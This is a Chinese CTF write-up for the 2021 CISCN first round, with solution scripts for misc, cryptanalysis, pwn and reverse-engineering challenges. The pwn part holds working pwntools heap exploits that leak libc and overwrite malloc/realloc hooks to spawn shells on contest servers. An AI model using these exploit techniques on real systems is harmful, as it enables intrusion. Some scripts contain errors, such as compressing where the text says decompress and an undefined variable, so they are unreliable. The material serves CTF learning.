2021-CISCN-First-Other

五月 16, 2021 (Updated: 2021-05-16)

Misc

tiny traffic

拿到流量包审计流量发现两个可疑文件test和secret，查看服务器响应信息得知其使用br算法压缩，写个脚本解压缩

import brotli

with open('secret','rb') as f:
    content = brotli.compress(f.read())
    with open('secret123','wb') as o:
        o.write(content)

test解压缩后得到proto3协议自定义规则。
python写个脚本用该规则读取secret中解压缩的数据得到flag，转一下格式即可

import flag_pb2 as flag

def read_test():
    flag_msg = flag.PBResponse()
    flag_msg_file = "./secret123"

    f = open(flag_msg_file, "rb")
    flag_msg.ParseFromString(f.read())
    f.close()

    print(flag_msg)

running_pixel

将gif文件分割后查看图片像素可以在RGB的低3位色道中看到一个突兀的小点，提取像素发现该值为(233,233,233)，且很多图片都有。
很明显该像素点的运动轨迹即为flag。运动轨迹提取脚本如下：

import os
from PIL import Image

files = os.listdir('./running_pixel.gif.ifl')

img = Image.new('RGB',(400,400),0)

num = 0
for file in files:
    tmp = Image.open('./running_pixel.gif.ifl/'+file)
    flag = 0 ; tmp_num = 0
    for i in range(400):
        for j in range(400):
            pixel = tmp.getpixel((j,i))
            tmp_num += 1
            if pixel == (233,233,233):
                img.putpixel((i,j),(255,255,255))
                flag = 1
                tmp_num = 0
                break
        if flag == 1:
            break
    if tmp_num == 160000:
        num += 1
        img.save('flag'+str(num).zfill(2)+'.png')
        for i in range(400):
            for j in range(400):
                img.putpixel((i,j),0)

隔空喊话

题目所给数据为PDU编码数据，工具解码即可看到关键提示。

查阅PDU编码格式资料发现第五行之后的数据时间顺序紊乱，脚本排序后再次解码可以得到宽高错误的png文件，提示w465，将宽度修改为465，高任意，然后打开即可看到flag

# 时间戳排序脚本
import binascii
with open('data.txt','r') as f:
    with open('data123.txt','w') as o:
        tmp = []
        for line in f.readlines():
            #36
            tmp.append(line.strip())
        
        for i in range(len(tmp)-1):
            for j in range(len(tmp)-1):
                tmp_data_1 = tmp[j]
                tmp_data_2 = tmp[j+1]
                tmp_data_1 = tmp_data_1[42:44][::-1]+tmp_data_1[44:46][::-1]
                tmp_data_2 = tmp_data_2[42:44][::-1]+tmp_data_2[44:46][::-1]
                if int(tmp_data_1[:2]) * 60 + int(tmp_data_1[2:]) > int(tmp_data_2[:2]) * 60 + int(tmp_data_2[2:]):
                    tmp_data = tmp[j+1]
                    tmp[j+1] = tmp[j]
                    tmp[j] = tmp_data

        for i in tmp:
            o.write(i+'\n')

# 解码后hex数据转文件
import binascii
with open('data.back.txt','r') as f:
    with open('data_hex','wb') as o:
        for line in f.readlines():
            o.write(binascii.a2b_hex(line.strip()))

robot

查看流量包可以发现流量包中存在明文坐标数据。脚本提取坐标画图直接出。

with open('cap.pcapng','rb') as f:
    with open('data.txt','wb') as o:
        f.read(0x120)
        tmp = f.read(0x1c)
        while tmp != b'':
            length = 0
            for i in f.read(4)[::-1]:
                length = length * 256 + i
            
            if length >= 135 and length <= 140:
                if length % 4 != 0:
                    length += 4 - length % 4    
                o.write(bytes.fromhex(hex(length)[2:]))
                o.write(f.read(length))
            else:
                if length % 4 != 0:
                    length += 4 - length % 4
                f.read(length)
            tmp = f.read(0x1c)


with open('data.txt','rb') as f:
    with open('address.txt','w') as o:
        length = f.read(1)
        while length != b'':
            data = f.read(length[0])
            
            l_index = data.index(b'Value\x00[')
            l_index = data.index(b'[',l_index)
            r_index = data.index(b']',l_index)
            data = data[l_index:r_index+1]
            data = data.decode()+'\n'
            if '-' not in data:
                o.write(data)
            length = f.read(1)

from PIL import Image

img = Image.new('L',(400,200))
with open('address.txt','r') as f:
    for line in f.readlines():
        line = eval(line.strip())
        img.putpixel((line[0],line[1]),255)

img.show()

Crypto

Move

和2021虎符的题挺像。
先造格子LLL，规约出x和y；再用二分法算出p+q；再解方程求出p和q；剩下就是ECC

n = 80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281
e = 67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809
h1 = 3518005
h2 = 641975
c = (6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605,38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028)

hn = int(sqrt(n))
M = matrix([[hn, e],
            [0, -n]])
L = M.LLL()[0]
# print (L)
# (-235436912945336662391026124471105219395770217328162018931594609419582745114251948238840212881814533708592325776478635076056630520429862826686225762483017735282225173655229129488512828712599656980161312082481987496707036067942329100, -406850608655407486298019095013146348847805975120061760929682791882948049742096195978800022454159691659865169100330308708576847735609146508679126419372034710027124703842712262177437006326228856546452636094881051757653949488135598409)
mm = matrix(L)
# print ((-mm)/M)
x, y = 26279444166664821795077701675621823220865336004430428203703688888211697122228, 22131877391133483964429946329193825460775374851078084751208971056041193500203
bound = int(sqrt(2 * n)) // 12

def find_p_puls_q(K, N):
    l = 0
    r = K
    for i in range(515):
        s = (l + r) // 2
        v = s * s - int(9 * s ^ 2 * (K - 1 - s) * (K - 1 - s)) // (round(N ^ 0.25) * round(N ^ 0.25))
        if v < 4 * N:
            l = s
        else:
            r = s
    return r

k = e * x - y * n
K = k // y
s = find_p_puls_q(K, n)
# print(s)
# s=18383013852155207284866834850624501649134164688503883162216824258842790032992437383933186349369945088653252318167911285710266631681220716855493349532603970
var('p q')
eq1 = p + q == s
eq2 = p * q == n
solve([eq1, eq2], p, q)
p = 7137110102022535123348664656689848983548191256934755709215236325084864398993149288243244941561397379979025441681860286823605147363784020425000696750337273
q = 11245903750132672161518170193934652665585973431569127453001587933757925633999288095689941407808547708674226876486050998886661484317436696430492652782266697
a = 0
x, y = 6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605, 38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028
# y^2==（x^3+b）%n
b = (y ^ 2 - x ^ 3) % n
# b=80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421103469394495274706241578726021598690355239783781433785479293793926265140251884444575671410967573946453503486277025286699273827984004452338
phi = (p + 1) * (q + 1)
d = inverse_mod(e, phi)
E = EllipticCurve(GF(p), [a, b])
C = E([x, y])
G = d * C
print(G)

from Crypto.Util.number import *
print(long_to_bytes(1500537458076802315061673741609048809282155574)+long_to_bytes(293348288331056197202496342835702240774641366909))

Imageencrypt

用testimage爆破key，排列组合试一下推出ch，然后求seq，再求x，求r，再求x0

# -*- coding: utf-8 -*-
from collections import Counter
import itertools
import md5

testimage=[205, 237, 6, 158, 24, 119, 213, 32, 74, 151, 142, 186, 57, 28, 113, 62, 165, 20, 190, 37, 159, 137, 196, 44, 97, 37, 7, 222, 220, 95, 4, 66, 0, 28, 199, 142, 95, 105, 119, 232, 250, 215, 60, 162, 91, 211, 63, 30, 91, 108, 217, 206, 80, 193, 230, 42, 221, 71, 136, 115, 22, 176, 91, 57, 61, 3, 87, 73, 250, 121, 51, 72, 83, 120, 77, 199, 236, 190, 249, 116, 45, 6, 134, 110, 149, 94, 214, 232, 153, 213, 119, 98, 81, 203, 240, 114, 240, 29, 122, 188, 156, 53, 128, 185, 40, 147, 245, 204, 47, 101, 80, 229, 41, 150, 28, 195, 25, 235, 119, 6, 192, 8, 73, 255, 159, 172, 77, 94, 254, 104, 236, 219, 141, 91, 195, 162, 97, 56, 252, 173, 163, 43, 167, 214, 50, 73, 115, 190, 254, 53, 61, 77, 138, 192, 15, 4, 190, 27, 37, 108, 101, 135, 90, 215, 106, 243, 112, 111, 106, 89, 143, 150, 185, 142, 192, 176, 48, 138, 164, 185, 61, 77, 72, 0, 17, 203, 210, 71, 186, 49, 162, 250, 218, 219, 195, 63, 248, 220, 155, 180, 219, 132, 219, 94, 144, 247, 211, 95, 70, 227, 222, 31, 69, 24, 13, 216, 185, 108, 137, 57, 186, 211, 55, 27, 158, 241, 223, 21, 134, 106, 152, 127, 187, 245, 246, 131, 176, 177, 228, 100, 112, 11, 84, 61, 193, 42, 41, 69, 229, 145, 254, 138, 3, 153, 123, 31]
enc_testimag=[131, 92, 72, 47, 177, 57, 131, 118, 4, 38, 192, 19, 119, 82, 63, 143, 235, 165, 15, 140, 209, 223, 117, 133, 47, 148, 81, 144, 138, 246, 173, 235, 177, 181, 110, 39, 9, 192, 57, 166, 180, 153, 141, 19, 234, 157, 142, 80, 234, 197, 151, 152, 249, 143, 176, 155, 147, 17, 57, 194, 191, 254, 13, 144, 140, 85, 25, 248, 172, 208, 154, 249, 5, 201, 27, 137, 69, 23, 175, 34, 156, 72, 208, 32, 195, 16, 127, 65, 207, 131, 57, 203, 7, 98, 89, 36, 65, 75, 211, 21, 45, 132, 214, 239, 102, 58, 68, 130, 97, 204, 225, 76, 152, 216, 74, 149, 79, 165, 198, 72, 150, 94, 7, 177, 46, 226, 252, 247, 79, 62, 69, 106, 60, 21, 106, 236, 47, 145, 170, 28, 18, 101, 14, 152, 131, 7, 37, 15, 168, 99, 115, 27, 220, 150, 89, 82, 232, 170, 107, 221, 212, 46, 235, 129, 36, 66, 217, 222, 36, 15, 217, 192, 247, 192, 113, 230, 129, 196, 13, 247, 148, 228, 225, 86, 71, 133, 132, 238, 236, 127, 11, 83, 107, 141, 114, 150, 182, 146, 213, 250, 141, 53, 114, 16, 198, 70, 133, 17, 247, 173, 136, 73, 236, 78, 188, 150, 239, 58, 199, 136, 11, 122, 134, 77, 47, 167, 137, 188, 55, 195, 41, 49, 245, 92, 160, 213, 254, 0, 85, 205, 193, 69, 2, 140, 143, 155, 127, 236, 179, 199, 168, 35, 85, 40, 45, 174]
enc_flagimag=[198, 143, 247, 3, 152, 139, 131, 84, 181, 180, 252, 177, 192, 25, 217, 179, 136, 107, 190, 62, 4, 6, 90, 53, 105, 238, 117, 44, 5, 116, 132, 195, 214, 171, 113, 209, 18, 31, 194, 174, 228, 212, 196, 14, 27, 41, 211, 56, 139, 135, 225, 214, 89, 122, 178, 212, 185, 231, 204, 150, 204, 212, 160, 142, 213, 173, 186, 166, 65, 238, 5, 32, 45, 31, 25, 189, 148, 38, 78, 79, 33, 56, 227, 48, 103, 163, 31, 189, 37, 124, 106, 249, 86, 188, 86, 233, 41, 250, 89, 7, 212, 234, 111, 104, 245, 102, 227, 96, 160, 67, 181, 13, 26, 192, 214, 210, 188, 84, 216, 215, 243, 72, 233, 2, 122, 166, 107, 251, 70, 128, 94, 190, 185, 210, 34, 85, 77, 29, 182, 77, 115, 208, 228, 252, 73, 198, 151, 70, 10, 97, 138, 235, 21, 117, 239, 102, 129, 2, 253, 80, 53, 61, 184, 220, 41, 82, 37, 140, 23, 143, 179, 53, 153, 113, 213, 211, 111, 197, 248, 65, 60, 69, 1, 81, 48, 254, 251, 89, 195, 8, 93, 190, 66, 174, 97, 175, 210, 191, 66, 112, 123, 128, 33, 230, 237, 104, 16, 192, 239, 173, 44, 10, 120, 231, 114, 151, 140, 63, 103, 44, 243, 222, 242, 73, 51, 46, 98, 137, 163, 152, 147, 95, 223, 3, 15, 112, 85, 215, 133, 131, 240, 239, 224, 195, 140, 124, 70, 156, 221, 241, 37, 245, 1, 99, 9, 157, 99, 150, 47, 118, 225, 16, 13, 141, 135, 99, 18, 119, 63, 160, 6, 247, 27, 68, 45, 199, 86, 193, 252, 21, 135, 32, 42, 103, 114, 241, 49, 249, 182, 52, 18, 155, 157, 61, 4, 246, 158, 52, 118, 242, 195, 54, 139, 232, 100, 31, 11, 233, 58, 100, 101, 137, 83, 145, 209, 7, 241, 96, 57, 148, 207, 29, 237, 124, 177, 166, 161, 20, 116, 122, 61, 71, 46, 82, 18, 157, 253, 130, 112, 66, 94, 57, 221, 243, 222, 192, 147, 5, 130, 201, 174, 26, 160, 16, 188, 103, 187, 11, 238, 182, 144, 4, 137, 33, 84, 100, 7, 239, 219, 83, 112, 189, 166, 58, 93, 141, 30, 198, 220, 196, 118, 172, 5, 45]

def generate(x, r):
    return round(r * x * (3 - x), 6)

keys = []
for i in range(256):
    keys.append(testimage[i] ^ enc_testimag[i])
c = Counter(keys)
#print(c.most_common(4))
for key1, key2 in itertools.product([86, 169], [78, 177]):
    chs = []
    for i in range(256):
        ch = -1
        if enc_testimag[i]^testimage[i] == key1:
            ch = 0
        if enc_testimag[i]^testimage[i] == (~key1)&0xff:
            ch = 1
        if enc_testimag[i]^testimage[i] == key2:
            ch = 2
        if enc_testimag[i]^testimage[i] == (~key2)&0xff:
            ch = 3
        chs.append(ch)
    binch = ''.join([bin(ch)[2:].rjust(2, '0') for ch in chs])
    seqs = [int(binch[i:i + 16], 2) for i in range(0, len(binch), 16)]
    rs = []
    for i in range(1, len(seqs)):
        x2 = seqs[i] / 22000
        x1 = seqs[i - 1] / 22000
        try:
            r = x2 / (x1 * (3 - x1))
        except:
            pass
        rs.append(r)

key1 = 169
key2 = 78
r = 1.2
seqs = [47909, 47275, 48284, 46656, 49226, 45038, 51495, 40740, 56131, 30213, 58976, 22593, 53493, 36492, 58734, 23276,
        54242, 34786, 59225, 21883, 52659, 38317, 57857, 25696, 56490, 29302, 58654, 23501, 54478, 34236, 59316, 21623]
tmp = [round(seq / 22000, 6) for seq in seqs]

v = round(tmp[0], 6)
for i in range(1000):
    tmpv = v - 1000 * 0.000001 + i * 0.000001
    f = True
    for j in range(0, len(seqs)):
        if int(seqs[j] != int(tmpv * 22000)):
            f = False
        tmpv = generate(tmpv, r)
    if f:
        print (v - 1000 * 0.000001 + i * 0.000001)

x = 2.177698
x0 = 0.840264
for i in range(len(seqs) - 1):
    x = generate(x, r)
for i in range(16):
    x = generate(x, r)
    seqs.append(int(x * 22000))
bins = ''
for seq in seqs:
    binx = bin(seq)[2:]
    if len(binx) < 16:
        binx = '0' * (16 - len(binx)) + binx
    bins += binx
plain = []
for i in range(24):
    for j in range(16):
        index = 16 * i + j
        ch = int(bins[2 * index:2 * index + 2], 2)
        pix = enc_flagimag[index]
        if ch == 0:
            pix =( pix^key1)&0xff
        if ch == 1:
            pix = (~pix^key1)&0xff
        if ch == 2:
            pix = (pix^key2)&0xff
        if ch == 3:
            pix = (~pix^key2)&0xff
        plain.append(pix)

data = ''.join(map(chr, plain))
print md5.new(data).hexdigest()

Rsa

msg1:e=3，RSA的低加密指数攻击

import gmpy2
from Crypto.Util.number import *
c = 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893
e = 3
n = 123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009L
i=0
while 1:
    if(gmpy2.iroot(c+i*n, 3)[1]==1):
        res = gmpy2.iroot(c+i*n, 3)
        ans = res[0]
        break
   i=i+1
#print(long_to_bytes(ans))
msg1=long_to_bytes(ans)

msg2:共模攻击
from libnum import n2s,s2n
import gmpy2
def egcd(a, b):
  if a == 0:
    return (b, 0, 1)
  else:
    g, y, x = egcd(b % a, a)
    return (g, x - (b // a) * y, y)
c1=54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
n=111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977L
e1=17
c2=91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950
e2=65537
s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]
if s1<0:
    s1 = - s1
    c1 = gmpy2.invert(c1, n)
elif s2<0:
    s2 = - s2
    c2 = gmpy2.invert(c2, n)
m = pow(c1,s1,n)*pow(c2,s2,n) % n
#print n2s(m)
msg2 = long_to_bytes(m)

msg3高位攻击恢复p
from Crypto.Util.number import *
import gmpy2
c3 = 59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
e3 = 65537
n3 = 
113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147L

#sage求p

p3 = 11437038763581010263116493983733546014403343859218003707512796706928880848035239990740428334091106443982769386517753703890002478698418549777553268906496423
m3 = 978430871477569051989776547659020359721056838635797362474311886436116962354292851181720060000979143571198378856012391742078510586927376783797757539078239088349758644144812898155106623543650953940606543822567423130350207207895380499638001151443841997176299548692737056724423631882

q3 = n3 / p3
phi3 = (p3-1) * (q3-1)
d = gmpy2.invert(e3,phi3)
msg3 = pow(c3,d,n3)
#print(long_to_bytes(msg3))
msg3=long_to_bytes(m3)

import md5
text =msg1+msg2+msg3
print text
print md5.new(text).hexdigest()

Pwn

pwny

from pwn import*
import sys
context.arch = 'amd64'
libc = ELF('./libc-2.27.so')
elf = ELF('./pwny')
r = remote('124.70.2.166', 23040)

def all_in(idx, cont='', flag=0):
    r.sendlineafter('choice: ', '2')
    r.sendlineafter('Index: ', str(idx))
    if flag == 1:
        r.send(str(cont))

def read(flag=0, idx=0):
    if flag == 1:
        r.sendlineafter('choice: ', '1')
        r.sendlineafter('Index: ', p64(idx))
    else:
        r.sendlineafter('Index: ', str(3))
        info("FD is not 0!!!")

def pwn():
    all_in(256)
    # gdb.attach(r)
    # gdb.attach(r, 'set *0x555555756860=0')
    read(1, 0xfffffffffffffff0)
    r.recvuntil('Result: ')
    libc_addr = int(r.recvuntil('\n', drop=1), 16) - libc.sym['__libc_start_main']
    if libc_addr < 0:
        r.close()
    malloc_hook = libc_addr + libc.sym['__malloc_hook']
    onegadget = [0x4f3d5, 0x4f432,0x10a41c]#
    onegadget = libc_addr + onegad[1]
    realloc = libc_addr + libc.sym['realloc']
    realloc_hook = libc_addr + libc.sym['__realloc_hook']
    read(1, 0xfffffffffffffff5)
    r.recvuntil('Result: ')
    text_addr = int(r.recvuntil('\n', drop=1), 16) - 0x202008
    array_addr = text_addr + 0x202060
    success("text_addr: 0x%x"%(text_addr))
    off = (realloc_hook - array_addr)/8
    all_in(off, p64(onegadget), 1)

    off = (malloc_hook - array_addr)/8
    all_in(off , p64(realloc+2), 1)

    r.sendline('1'*0x500)

if __name__ == '__main__':
        while 1:
            try:
                r = remote('123.60.211.115', 23074)
                pwn()
                r.interactive()
            except:
                r.close()

lonelywolf

from pwn import*
import sys
context.arch = 'amd64'
def add(size):
    r.sendlineafter('choice: ','1')
    r.sendlineafter('Index: ', '0')
    r.sendlineafter('Size: ',str(size))

def edit(cont):
    r.sendlineafter('choice: ','2')
    r.sendlineafter('Index: ', '0')
    r.sendlineafter('Content: ',str(cont))

def delete():
    r.sendlineafter('choice: ', '4')
    r.sendlineafter('Index: ', '0')

def show():
    r.sendlineafter('choice: ', '3')
    r.sendlineafter('Index: ', '0')

def confirm(name,addr):
    log.success('The '+str(name)+' Addr=====> ' + str(hex(addr)))


main_arena = 0x3ebc40
elf=ELF('./lonelywolf')
libc=ELF('./libc-2.27.so')


def pwn():
    #UAF
    add(8)
    delete()
    edit('A'*7 + 'B')
    show()
    r.recvuntil('B')
    heap_base = u64(r.recvuntil('\n', drop=1, timeout=1).ljust(8, '\x00')) - 0x10
    key = heap_base + 0x10
    edit(p64(0))
    add(0x10)
    delete()
    edit(p64(heap_base+0x10) +  p64(key))
    add(0x10)
    add(2)
    edit(p8(0)+p8(0x7))
    add(0x20)
    delete()
    add(0x30)
    r.sendline('1'*0x500)
    add(0x20)
    show()
    r.recvuntil('Content: ')
    libc_addr = u64(r.recvuntil('\n', drop=1).ljust(8, '\x00')) - 0x80 -main_arena
    malloc_hook = libc_addr + libc.sym['__malloc_hook']
    realloc_hook = libc_addr + libc.sym['__realloc_hook']
    realloc = libc_addr + libc.sym['realloc']
    onegad = [0x4f3d5, 0x4f432,0x10a41c]
    onegadget = libc_addr + onegad[2]
    confirm('malloc_hook', malloc_hook)
    confirm('onegadget', onegadget)
    add(0x30)
    delete()
    edit(p64(malloc_hook)+ p64(key))
    add(0x30)
    add(0x30)
    edit(p64(onegadget))
    add(0x30)


if __name__ == '__main__':
    r = remote('123.60.211.115',22997)
    pwn()
    r.interactive()

Re

glass

简单安卓native层逆向，解包后找到so文件直接ida加载就能看见checkflag函数，逻辑简单，三个小加密函数，对着写解密脚本就行

flag = [
        0xA3, 0x1A, 0xE3, 0x69, 0x2F, 0xBB, 0x1A, 0x84, 0x65, 0xC2, 
        0xAD, 0xAD, 0x9E, 0x96, 0x05, 0x02, 0x1F, 0x8E, 0x36, 0x4F, 
        0xE1, 0xEB, 0xAF, 0xF0, 0xEA, 0xC4, 0xA8, 0x2D, 0x42, 0xC7, 
        0x6E, 0x3F, 0xB0, 0xD3, 0xCC, 0x78, 0xF9, 0x98, 0x3F
]
password = '12345678'

tmp_1 = [i for i in range(256)]
tmp_2 = [password[i%8] for i in range(256)]

v9 = 0
for i in range(256):
    v10 = tmp_1[i]
    v9 = (v9 + v10 + ord(tmp_2[i])) % 256
    tmp_1[i] = tmp_1[v9]
    tmp_1[v9] = v10

for i in range(39):
    flag[i] ^= ord(password[i%8])

for i in range(38,0,-3):
    flag[i-1] ^= flag[i-2]
    flag[i] ^= flag[i-1]
    flag[i-2] ^= flag[i]

v3 = 0
for i in range(38):
    v5 = tmp_1[i+1]
    v3 = (v3+v5)%256
    tmp_1[i+1] = tmp_1[v3]
    tmp_1[v3] = v5
    flag[i] ^= tmp_1[(v5+tmp_1[i+1])%256]

print(''.join([chr(i) for i in flag]))

ciscn_gift

go语音逆向，去除了符号表，这里比赛中未能做出（因为菜鸡最后也没学会怎么手动恢复go语言编译器生成的无符号表exe,这里出题人处理掉了.gopclntab）

赛后才知道IDA7.6加载的话可以直接自动恢复。应该是利用.STRTAB和另一个记载了函数起始地址的表直接恢复（关于这个恢复原理是本人猜测，还未尝试验证）

官网下载IDA7.6-free版,然后直接分析程序。

在主函数main_main里看到输出flag的代码逻辑，逐字节输出，预设了一个密文表，属于查表计算，主要在于计算每一字节对应的index

main_wtf是一个递归函数，index的关键计算公式经优化结果为：x=x-17*(x>>4)+1,其递归次数的规律符合如下函数：

$f(n) = \begin{cases} 2, n = 1\\ 2^{2*n-3}+2*f(n-1), n > 1\\ \end{cases}$

f(n)的输出是有循环规律的，这里直接给出：

$[2, 6, 3, 4, 0, 2, 12, 5]$

将出题人给出的递归深度数据直接模八取余对应查表即可得到flag，脚本如下：

ida_chars =[
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1A, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1B, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1F, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x25, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x27, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x2B, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x2D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2F, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x35, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x39, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x3B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3D, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3E, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x3F, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x45, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x47, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x00, 0x00, 
